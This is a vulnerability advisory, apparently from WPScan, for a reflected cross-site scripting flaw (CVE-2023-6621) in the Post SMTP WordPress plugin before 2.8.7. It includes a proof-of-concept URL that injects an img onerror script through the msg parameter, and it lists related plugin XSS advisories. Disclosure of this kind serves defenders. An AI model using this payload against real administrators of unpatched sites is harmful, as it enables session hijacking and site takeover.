Post SMTP < 2.8.7 – Reflected Cross-Site Scripting | CVE 2023-6621 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the msg parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

Make a logged in admin open the following URL:

https://example.com/wp-admin/admin.php?page=postman%2Fconfiguration_wizard&success=1&msg=hello<img+src%3Dx+onerror%3Dalert(document.domain)>

Affects Plugins

Fixed in 2.8.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Alex Sanford

Submitter

Alex Sanford

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

b49ca336-5bc2-4d72-a9a5-b8c020057928

Timeline

Publicly Published

2023-12-21 (about 2 years ago)

Added

2023-12-21 (about 2 years ago)

Last Updated

2024-01-03 (about 1 year ago)

Other

Published

Title

Published

2024-06-05

Title

Themesflat Addons For Elementor < 2.1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting in Multiple Widgets

Published

2023-08-11

Title

Flowpaper < 2.0.0 - Contributor+ Stored XSS

Published

2022-10-27

Title

Gallery with Thumbnail Slider < 6.1 - Contributor+ Stored XSS

Published

2025-09-05

Title

Best Restaurant Menu by PriceListo <= 1.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-03-01

Title

Nextend Social Login and Register < 3.1.13 - Reflected Self-Based Cross-Site Scripting via error_description